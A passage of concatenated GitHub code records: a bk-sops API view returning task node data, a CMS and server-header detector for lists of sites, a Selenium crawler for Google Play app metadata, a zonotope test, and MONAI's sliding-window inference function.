gcloud.analysis_statistics.models import TaskflowExecutedNodeStatistics\nfrom gcloud.apigw.decorators import mark_request_whether_is_trust, return_json_response\nfrom gcloud.apigw.decorators import project_inject\nfrom gcloud.core.apis.drf.serilaziers import NodeExecutionRecordResponseSerializer\nfrom gcloud.taskflow3.models import TaskFlowInstance\nfrom gcloud.iam_auth.intercept import iam_intercept\nfrom gcloud.iam_auth.view_interceptors.apigw import TaskViewInterceptor\nfrom apigw_manager.apigw.decorators import apigw_require\n\n\n@login_exempt\n@csrf_exempt\n@require_GET\n@apigw_require\n@return_json_response\n@mark_request_whether_is_trust\n@project_inject\n@iam_intercept(TaskViewInterceptor())\ndef get_task_node_data(request, task_id, project_id):\n project = request.project\n task = TaskFlowInstance.objects.get(id=task_id, project_id=project.id)\n\n node_id = request.GET.get(\"node_id\")\n component_code = request.GET.get(\"component_code\")\n loop = request.GET.get(\"loop\")\n template_node_id = request.GET.get(\"template_node_id\")\n\n try:\n subprocess_stack = json.loads(request.GET.get(\"subprocess_stack\", \"[]\"))\n except Exception:\n return {\n \"result\": False,\n \"message\": \"subprocess_stack is not a valid array json\",\n \"code\": err_code.REQUEST_PARAM_INVALID.code,\n }\n\n data = task.get_node_data(node_id, request.user.username, component_code, subprocess_stack, loop)\n\n if data[\"result\"] and template_node_id:\n execution_time_data = (\n TaskflowExecutedNodeStatistics.objects.filter(\n template_node_id=template_node_id, status=True, is_skip=False, task_template_id=task.template_id\n )\n .order_by(\"-archived_time\")\n .values(\"archived_time\", \"elapsed_time\")\n )[: settings.MAX_RECORDED_NODE_EXECUTION_TIMES]\n serializer = NodeExecutionRecordResponseSerializer(data={\"execution_time\": execution_time_data})\n serializer.is_valid()\n data[\"data\"].update(serializer.validated_data)\n\n return {\n \"result\": data[\"result\"],\n \"data\": data[\"data\"],\n \"message\": data[\"message\"],\n \"code\": err_code.SUCCESS.code if data[\"result\"] else err_code.UNKNOWN_ERROR.code,\n }\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/apigw/views/get_task_node_data.py","file_name":"get_task_node_data.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"11960863012","text":"import os\r\nimport requests\r\n\r\nfrom modules.module_cmsWordPress import cmsWordPress\r\nfrom modules.module_cmsDrupal import cmsDrupal\r\nfrom modules.module_cmsJoomla import cmsJoomla\r\nfrom modules.module_savingData import savingData\r\n\r\n#########################################################################\r\n\r\nclass mainManager:\r\n\r\n # ***************************************************************\r\n def __init__(self, params):\r\n self.params = params\r\n self.status = self.main(self.params)\r\n\r\n # ***************************************************************\r\n def main(self, userSelect):\r\n\r\n pathToFile = userSelect[\"pathToFile\"]\r\n pathToSave = userSelect[\"pathToSave\"]\r\n extension = userSelect[\"extension\"]\r\n genLogs = userSelect[\"genLogs\"]\r\n\r\n fullPath = \"\"\r\n if genLogs:\r\n fileName = \"Logs.txt\"\r\n fullPath = os.path.join(pathToSave, fileName)\r\n file_listLogs = open(fullPath, \"w\")\r\n file_listLogs.close()\r\n\r\n finalData = {}\r\n file_listSites = open(pathToFile, \"r\")\r\n\r\n for url in file_listSites:\r\n url = url.strip()\r\n if url[-1] == \"/\":\r\n url = url[:-1]\r\n print(url)\r\n\r\n secretInfo = self.gettingInfo(url)\r\n if fullPath != \"\":\r\n message = \"* \" + url + \" :\\n\"\r\n\r\n if \"Error connection\" not in secretInfo:\r\n message += \">>> Identification of Server : \"\r\n message += \"success\\n\" if \"not available\"\\\r\n not in secretInfo[\"Server\"] else \"error\\n\"\r\n message += \">>> Identification of CMS : \"\r\n message += \"success\\n\" if \"not defined\"\\\r\n not in secretInfo[\"CMS\"] else \"error\\n\"\r\n\r\n else:\r\n message += \"error connection\\n\"\r\n\r\n file_listLogs = open(fullPath, \"a\")\r\n file_listLogs.write(message + \"#\"*50 + \"\\n\")\r\n file_listLogs.close()\r\n\r\n print(secretInfo)\r\n print(\"#\" * 50)\r\n finalData.update({url: secretInfo})\r\n file_listSites.close()\r\n\r\n ############################################################\r\n magic = savingData(finalData, pathToSave, extension).status\r\n ############################################################\r\n\r\n return magic\r\n\r\n # ***************************************************************\r\n def gettingInfo(self, urlAddress):\r\n\r\n if \"http\" not in urlAddress:\r\n urlAddress = \"http://\" + urlAddress\r\n\r\n result = {}\r\n try:\r\n data = requests.get(urlAddress)\r\n except:\r\n return \"Error connection to '{}'\".format(urlAddress)\r\n\r\n primaryInfo = data.headers\r\n if \"server\" in primaryInfo.keys() and primaryInfo[\"server\"]!=\"\":\r\n serverInfo = primaryInfo[\"server\"]\r\n else:\r\n serverInfo = \"Server info is not available\"\r\n result.update({ \"Server\": serverInfo })\r\n\r\n cmsInfo = \"\"\r\n if cmsWordPress(urlAddress).status == True:\r\n cmsInfo += \"WordPress\"\r\n elif cmsDrupal(urlAddress).status == True:\r\n cmsInfo += \"Drupal\"\r\n elif cmsJoomla(urlAddress).status == True:\r\n cmsInfo += \"Joomla\"\r\n else:\r\n cmsInfo += \"CMS is not defined\"\r\n result.update({ \"CMS\": cmsInfo })\r\n\r\n return result\r\n\r\n#########################################################################\r\n\r\nif __name__ == \"__main__\":\r\n testParams = {\r\n 'pathToFile': 'D:\\\\test_siteList.txt',\r\n 'pathToSave': 'D:\\\\test_saveDir',\r\n 'extension': 'txt',\r\n 'genLogs': True\r\n }\r\n status = mainManager(testParams).status\r\n print(\"#\"*50)\r\n if status == True:\r\n print(\"Information about sites is stored\")\r\n else:\r\n print(\"Error when saving data\")\r\n\r\n#========================================================================\r\n","repo_name":"vdenisov-python/desktop-cms-detector","sub_path":"appManager.py","file_name":"appManager.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557185809","text":"# -*- coding: utf-8 -*-\n#-------------------------------------------------------------------------------------#\n# Name: crawl.py #\n# Description: an efficient multi-process web crawler that automatically scrapes #\n# app info from Google Play #\n#-------------------------------------------------------------------------------------#\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport multiprocessing as mp\nimport json\nimport csv\nimport time\nimport argparse\nfrom queue import Full, Empty\n\nCATEGORIES = ['Action', 'Adventure', 'Arcade', 'Board', 'Card',\n 'Casino', 'Casual', 'Educational', 'Music', 'Puzzle',\n 'Racing', 'Role_Playing', 'Simulation', 'Sports',\n 'Strategy', 'Trivia', 'Word']\n\nCHROME_PATH = 'Z:/chromedriver.exe'\n\nSTART_PACKAGES = [\n 'com.orangeapps.piratetreasure',\n 'se.hellothere.gravityhd',\n 'com.makingfun.mageandminions',\n 'com.gameloft.android.ANMP.Gloft5DHM',\n 'com.Zeeppo.GuitarBand',\n]\n\nXPATHS = {\n 'general': {\n 'Category': \"//a[@itemprop='genre']\",\n 'Name': \"//h1[@itemprop = 'name']/span\",\n 'Price': \"//button[@aria-label and span[span]]\",\n 'Updated': \"//div[div='Updated']/span/div/span\",\n 'Size': \"//div[div='Size']/span/div/span\",\n 'Installs': \"//div[div='Installs']/span/div/span\",\n 'Requires_Android': \"//div[div='Requires Android']/span/div/span\",\n 'Age': \"//div[div='Content Rating']/span/div/span/div\",\n 'Inapp_Products': \"//div[div='In-app Products']/span/div/span\",\n 'Developer': \"//div[div='Offered By']/span/div/span\",\n 'Description': \"//content/div[@jsname='sngebd']\",\n 'Rating': \"//div[@class='BHMmbe']\",\n 'Rating_Total': \"//span[@aria-label]\",\n 'Content_Feature': \"//div[div='Content Rating']/span/div/span/div[2]\",\n 'Version': \"//div[div='Current Version']/span/div/span\",\n },\n 'rating': {\n 'Rating_5': \"//div[span = '5']/span[@title]\",\n 'Rating_4': \"//div[span = '4']/span[@title]\",\n 'Rating_3': \"//div[span = '3']/span[@title]\",\n 'Rating_2': \"//div[span = '2']/span[@title]\",\n 'Rating_1': \"//div[span = '1']/span[@title]\",\n },\n # 'permission': {\n # 'button': \"//div[div = 'Permissions']/span/div/span/div/a\",\n # 'each_item': \"//li[@class = 'NLTG4']/span\",\n # },\n}\n\nHEADERS = {\n 'full': ['Category', 'Package', 'Name', 'Updated', 'Size',\n 'Installs', 'Requires_Android', 'Age', 'Developer', 'Rating',\n 'Rating_Total', 'Rating_5', 'Rating_4', 'Rating_3', 'Rating_2',\n 'Rating_1', 'Price', 'Description',\n 'Content_Feature', 'Permission', 'Inapp_Products', 'Version'],\n 'trivial': ['Inapp_Products', 'Permission'],\n}\n\n\nclass Crawler:\n \"\"\"\n A web crawler object that can fetch app pages from Google Play and parse them\n into app info dict.\n \n Parameters\n ----------\n driver: Selenium.webdriver.Chrome object\n a selenium webdriver object utilized to control the browser\n \"\"\"\n\n def __init__(self, driver):\n self.driver = driver\n time.sleep(5)\n\n def get_page_by_package(self, package):\n \"\"\"\n Given an Android package name, fetch the app info page from Google Play.\n\n Returns: None\n \"\"\"\n self.driver.get(\n 'https://play.google.com/store/apps/details?id=' + package)\n time.sleep(1)\n\n def parse_current_page(self):\n \"\"\"\n Parse the current page into a python dict based on the key-xpath pairs in\n varaible XPATH.\n\n Returns: dict{str: str, ... , str: str}\n \"\"\"\n parsed_dic = {}\n for key, xpath in XPATHS['general'].items():\n try:\n parsed_dic[key] = self.driver.find_element_by_xpath(xpath).text\n except Exception as e:\n pass\n for key, xpath in XPATHS['rating'].items():\n try:\n parsed_dic[key] = self.driver.find_element_by_xpath(\n xpath).get_attribute('title')\n except Exception as e:\n pass\n return parsed_dic\n\n def explore_packages(self):\n \"\"\"\n Click the see-more button, parse similar apps from this page, and return their\n package names in a python set.\n\n Returns: set{str, str, ... , str}\n \"\"\"\n def scroll_down(driver, clicks):\n for _ in range(clicks):\n ActionChains(driver).key_down(Keys.DOWN).perform()\n\n res = set()\n try:\n self.driver.find_element_by_xpath(\n \"//a[@aria-label and text() = 'See more']\").click()\n # scroll_down(self.driver, 50)\n time.sleep(1)\n for elem in self.driver.find_elements_by_xpath(\"//span[@class = 'preview-overlay-container']\"):\n res.add(elem.get_attribute('data-docid'))\n except Exception as e:\n print(e)\n return res\n\n\nclass PackageInfoWriter:\n \"\"\"\n Converts app info dicts to a feature vector and buffer them. The buffer is\n periodically written to the target path.\n\n Parameters\n ----------\n csv_path: str\n the csv file to write data\n period: int\n the number of rows to buffer before writing to csv file\n strict_mode: bool\n skip the package if at least one attribute is missing\n \"\"\"\n def __init__(self, csv_path, period, strict_mode):\n \"\"\"\n csv_path: str\n the csv file to write data\n period: int\n the number of rows to buffer before writing to csv file\n strict_mode: bool\n skip the package if at least one attribute is missing\n\n Returns: None\n \"\"\"\n self.buffer, self.count = [], 0\n self.path, self.period, self.strict = csv_path, period, strict_mode\n\n def write(self):\n \"\"\"\n Write(append) the buffered rows to a csv file and clear the buffer.\n\n Returns: None\n \"\"\"\n with open(self.path, 'a', encoding='utf-8', newline='') as fout:\n csvout = csv.writer(fout)\n csvout.writerows(self.buffer)\n self.buffer = []\n\n def process_dic(self, dic, package):\n \"\"\"\n Given a package and its info dict, convert the dict to a vector based on the\n attributes specified in HEADERS['full'], replace the missing trivial attribute\n with '???', then append it to the buffer.\n\n dic: dict{str: str, ... str: str}\n the info dict parsed from a Google Play page\n package: str\n the name of the package\n\n Returns: None\n \"\"\"\n\n def vectorize_dic(dic, package):\n for key in HEADERS['trivial']:\n dic[key] = dic.get(key, '???')\n dic['Package'] = package\n return [dic.get(key, '').replace('\\n', ' ') for key in HEADERS['full']]\n\n vec = vectorize_dic(dic, package=package)\n if len(dic) < 10 or self.strict and '' in vec:\n print('pakcage %s missing property %d' %\n (package, vec.index('')))\n return False\n\n self.buffer.append(vec)\n self.count += 1\n if self.count % self.period == 0:\n self.write()\n return True\n\n def close(self):\n \"\"\"\n Write the remaining buffered rows to the csv file.\n\n Returns: None\n \"\"\"\n self.write()\n\n\ndef scheduler(Q1, Q2, verbose):\n \"\"\"\n A process that repeatedly sends packages to worker processes based on a BFS-search\n approach and fetches additional packages from worker process and append them to the\n BFS queue. Can only be terminated by Ctrl-C. Notes that visted packages and bfs-queue\n will be saved to and restored from \"./log/scrape.json\".\n\n Q1: multiprocessing.Queue object\n Q2: multiprocessing.Queue object\n verbose: bool\n\n Returns: None\n \"\"\"\n try:\n with open('log/scrape.json', 'r') as fin:\n visited, queue = json.load(fin)\n visited = set(visited)\n except OSError:\n visited = set()\n queue = START_PACKAGES\n\n count = 0\n stop_flag = False\n try:\n while True:\n while queue:\n try:\n if queue[0] not in visited:\n Q1.put(queue[0], block=False)\n visited.add(queue[0])\n count += 1\n queue.pop(0)\n except Full:\n break\n else:\n if stop_flag:\n break\n else:\n stop_flag = True\n while True:\n try:\n if stop_flag:\n pkg = Q2.get(timeout=30)\n else:\n pkg = Q2.get(block=False)\n stop_flag = False\n if pkg not in visited and pkg not in queue and len(queue) < 100000:\n queue.append(pkg)\n except Empty:\n break\n if count % 100 == 0:\n count = 1\n if verbose:\n print('storing data, current length of queue is %d' %\n len(queue))\n with open('log/scrape.json', 'w') as fout:\n json.dump([list(visited), queue], fout, indent=4)\n finally:\n with open('log/scrape.json', 'w') as fout:\n json.dump([list(visited), queue], fout, indent=4)\n\n\ndef crawl(Q1, Q2, pid, args):\n \"\"\"\n The worker process that consumes packages from scheduler process, scrapes it from\n Google Play, parses it into a python dict, writes it to a csv file, and send more\n packages to scheduler. Can only be terminated by Ctrl-C.\n\n Q1: multiprocessing.Queue object\n Q2: multiprocessing.Queue object\n pid: int\n args: argparse.Namespace object\n\n Returns: None\n \"\"\"\n print('Process %d started...' % pid)\n options = Options()\n options.add_experimental_option(\n 'prefs', {'intl.accept_languages': 'en,en_US'})\n if args.headless:\n options.add_argument('--headless')\n options.add_argument('--log-level=3')\n driver = webdriver.Chrome(executable_path=CHROME_PATH, options=options)\n writer = PackageInfoWriter('raw/%d.csv' % pid, 5, args.strict)\n crawler = Crawler(driver)\n\n try:\n while True:\n try:\n package = Q1.get(timeout=120)\n except Empty:\n break\n crawler.get_page_by_package(package)\n dic = crawler.parse_current_page()\n if 'Category' in dic and dic['Category'].replace(' ', '_') in CATEGORIES:\n dic['Category'] = dic['Category'].replace(' ', '_')\n print('[%d] %s %s' % (pid, package, dic['Category']))\n writer.process_dic(dic, package)\n new_pkgs = crawler.explore_packages()\n if args.verbose:\n print('appending %d packages to queue' % len(new_pkgs))\n for pkg in new_pkgs:\n Q2.put(pkg)\n except Exception as e:\n print(e)\n finally:\n print('Process %d exit...' % pid)\n driver.quit()\n writer.close()\n\n\ndef main(args):\n \"\"\"\n Create two multiprocessing.Queue objects for communication between sceduler and\n workers, then start one scheduler process and n (specified by args.n, default 8)\n worker processes.\n\n args: argparse.Namespace object\n\n Returns: None\n \"\"\"\n Q1 = mp.Queue(maxsize=20)\n Q2 = mp.Queue(maxsize=1000)\n mp.Process(target=scheduler, args=(Q1, Q2, args.verbose)).start()\n for i in range(args.n):\n mp.Process(target=crawl, args=(Q1, Q2, i, args)).start()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-n',\n type=int,\n default=8,\n help=\"the number of worker processes to use (default: 8)\")\n parser.add_argument('--headless',\n action='store_true',\n help=\"use the headless version of Chrome\")\n parser.add_argument('--strict',\n action='store_true',\n help=\"skip the package if at least one attribute is missing\")\n parser.add_argument('-v', '--verbose',\n action='store_true',\n help=\"increase verbosity\")\n args = parser.parse_args()\n main(args)\n","repo_name":"yanlinf/MobileGameClassification","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":12764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23047041647","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport numpy as np\n\nos.chdir('tests/')\nsys.path.append(\"..\")\n\nfrom engine.set.zono import Zono\n\ndef main():\n dim = 4\n C = np.ones(dim).reshape(-1,1)\n V = np.eye(dim)\n Z = Zono(C,V)\n \n W = np.random.rand(dim,dim)\n b = np.random.rand(dim,1)\n\n print('W: \\n', W)\n print('b: \\n', b)\n\n Z1 = Z.affineMap(W,b)\n print(Z1)\n print(Z1.__repr__) \n\n\nif __name__ == '__main__':\n main() ","repo_name":"V2A2/StarV_temp","sub_path":"tests/set/zono/test_zono_affineMap.py","file_name":"test_zono_affineMap.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8958812293","text":"from typing import Callable, Optional, Sequence, Tuple, Union\n\nimport torch\nimport torch.nn.functional as F\n\nfrom monai.data.utils import compute_importance_map, dense_patch_slices, get_valid_patch_size\nfrom monai.utils import BlendMode, PytorchPadMode, fall_back_tuple\n\n\ndef sliding_window_inference(\n inputs: torch.Tensor,\n roi_size: Union[Sequence[int], int],\n sw_batch_size: int,\n predictor: Callable[[torch.Tensor], torch.Tensor],\n overlap: float = 0.25,\n mode: Union[BlendMode, str] = BlendMode.CONSTANT,\n sigma_scale: Union[Sequence[float], float] = 0.125,\n padding_mode: Union[PytorchPadMode, str] = PytorchPadMode.CONSTANT,\n cval: float = 0.0,\n device: Optional[torch.device] = None,\n) -> torch.Tensor:\n \"\"\"\n Sliding window inference on `inputs` with `predictor`.\n\n When roi_size is larger than the inputs' spatial size, the input image are padded during inference.\n To maintain the same spatial sizes, the output image will be cropped to the original input size.\n\n Args:\n inputs: input image to be processed (assuming NCHW[D])\n roi_size: the spatial window size for inferences.\n When its components have None or non-positives, the corresponding inputs dimension will be used.\n if the components of the `roi_size` are non-positive values, the transform will use the\n corresponding components of img size. For example, `roi_size=(32, -1)` will be adapted\n to `(32, 64)` if the second spatial dimension size of img is `64`.\n sw_batch_size: the batch size to run window slices.\n predictor: given input tensor `patch_data` in shape NCHW[D], `predictor(patch_data)`\n should return a prediction with the same spatial shape and batch_size, i.e. NMHW[D];\n where HW[D] represents the patch spatial size, M is the number of output channels, N is `sw_batch_size`.\n overlap: Amount of overlap between scans.\n mode: {``\"constant\"``, ``\"gaussian\"``}\n How to blend output of overlapping windows. Defaults to ``\"constant\"``.\n\n - ``\"constant``\": gives equal weight to all predictions.\n - ``\"gaussian``\": gives less weight to predictions on edges of windows.\n\n sigma_scale: the standard deviation coefficient of the Gaussian window when `mode` is ``\"gaussian\"``.\n Default: 0.125. Actual window sigma is ``sigma_scale`` * ``dim_size``.\n When sigma_scale is a sequence of floats, the values denote sigma_scale at the corresponding\n spatial dimensions.\n padding_mode: {``\"constant\"``, ``\"reflect\"``, ``\"replicate\"``, ``\"circular\"``}\n Padding mode for ``inputs``, when ``roi_size`` is larger than inputs. Defaults to ``\"constant\"``\n See also: https://pytorch.org/docs/stable/nn.functional.html#pad\n cval: fill value for 'constant' padding mode. Default: 0\n device: device running the concatenation of the windows.\n By default the device and accordingly the memory of the input device is used. If for example\n set to device=torch.device('cpu') the gpu memory consumption is less and independent of the\n input and roi_size parameter. Output is on the device set or if not set the inputs device.\n\n Raises:\n NotImplementedError: When ``inputs`` does not have batch size = 1.\n\n Note:\n - input must be channel-first and have a batch dim, support both spatial 2D and 3D.\n - currently only supports `inputs` with batch_size=1.\n\n \"\"\"\n num_spatial_dims = len(inputs.shape) - 2\n assert 0 <= overlap < 1, \"overlap must be >= 0 and < 1.\"\n\n # determine image spatial size and batch size\n # Note: all input images must have the same image size and batch size\n image_size_ = list(inputs.shape[2:])\n batch_size = inputs.shape[0]\n\n # TODO: Enable batch sizes > 1 in future\n if batch_size > 1:\n raise NotImplementedError(\"Currently only inputs with batch size = 1 are supported.\")\n\n if device is None:\n device = inputs.device\n\n roi_size = fall_back_tuple(roi_size, image_size_)\n # in case that image size is smaller than roi size\n image_size = tuple(max(image_size_[i], roi_size[i]) for i in range(num_spatial_dims))\n pad_size = []\n for k in range(len(inputs.shape) - 1, 1, -1):\n diff = max(roi_size[k - 2] - inputs.shape[k], 0)\n half = diff // 2\n pad_size.extend([half, diff - half])\n inputs = F.pad(inputs, pad=pad_size, mode=PytorchPadMode(padding_mode).value, value=cval)\n\n scan_interval = _get_scan_interval(image_size, roi_size, num_spatial_dims, overlap)\n\n # Store all slices in list\n slices = dense_patch_slices(image_size, roi_size, scan_interval)\n\n slice_batches = []\n for slice_index in range(0, len(slices), sw_batch_size):\n slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices)))\n input_slices = []\n for curr_index in slice_index_range:\n curr_slice = slices[curr_index]\n if len(curr_slice) == 3:\n input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1], curr_slice[2]])\n else:\n input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1]])\n slice_batches.append(torch.stack(input_slices))\n\n # Perform predictions\n output_rois = list()\n for data in slice_batches:\n seg_prob = predictor(data) # batched patch segmentation\n output_rois.append(seg_prob.to(device))\n\n # stitching output image\n output_classes = output_rois[0].shape[1]\n output_shape = [batch_size, output_classes] + list(image_size)\n\n # Create importance map\n importance_map = compute_importance_map(\n get_valid_patch_size(image_size, roi_size), mode=mode, sigma_scale=sigma_scale, device=device\n )\n\n # allocate memory to store the full output and the count for overlapping parts\n output_image = torch.zeros(output_shape, dtype=torch.float32, device=device)\n count_map = torch.zeros(output_shape, dtype=torch.float32, device=device)\n\n for window_id, slice_index in enumerate(range(0, len(slices), sw_batch_size)):\n slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices)))\n\n # store the result in the proper location of the full output. Apply weights from importance map.\n for curr_index in slice_index_range:\n curr_slice = slices[curr_index]\n if len(curr_slice) == 3:\n output_image[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += (\n importance_map * output_rois[window_id][curr_index - slice_index, :]\n )\n count_map[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += importance_map\n else:\n output_image[0, :, curr_slice[0], curr_slice[1]] += (\n importance_map * output_rois[window_id][curr_index - slice_index, :]\n )\n count_map[0, :, curr_slice[0], curr_slice[1]] += importance_map\n\n # account for any overlapping sections\n output_image = output_image / count_map\n\n if num_spatial_dims == 3:\n return output_image[\n ...,\n pad_size[4] : image_size_[0] + pad_size[4],\n pad_size[2] : image_size_[1] + pad_size[2],\n pad_size[0] : image_size_[2] + pad_size[0],\n ]\n return output_image[\n ..., pad_size[2] : image_size_[0] + pad_size[2], pad_size[0] : image_size_[1] + pad_size[0]\n ] # 2D\n\n\ndef _get_scan_interval(\n image_size: Sequence[int], roi_size: Sequence[int], num_spatial_dims: int, overlap: float\n) -> Tuple[int, ...]:\n \"\"\"\n Compute scan interval according to the image size, roi size and overlap.\n Scan interval will be `int((1 - overlap) * roi_size)`, if interval is 0,\n use 1 instead to make sure sliding window works.\n\n \"\"\"\n if len(image_size) != num_spatial_dims:\n raise ValueError(\"image coord different from spatial dims.\")\n if len(roi_size) != num_spatial_dims:\n raise ValueError(\"roi coord different from spatial dims.\")\n\n scan_interval = []\n for i in range(num_spatial_dims):\n if roi_size[i] == image_size[i]:\n scan_interval.append(int(roi_size[i]))\n else:\n interval = int(roi_size[i] * (1 - overlap))\n scan_interval.append(interval if interval > 0 else 1)\n return tuple(scan_interval)\n","repo_name":"precision-medicine-um/MONAI-Deep_Learning","sub_path":"monai/inferers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}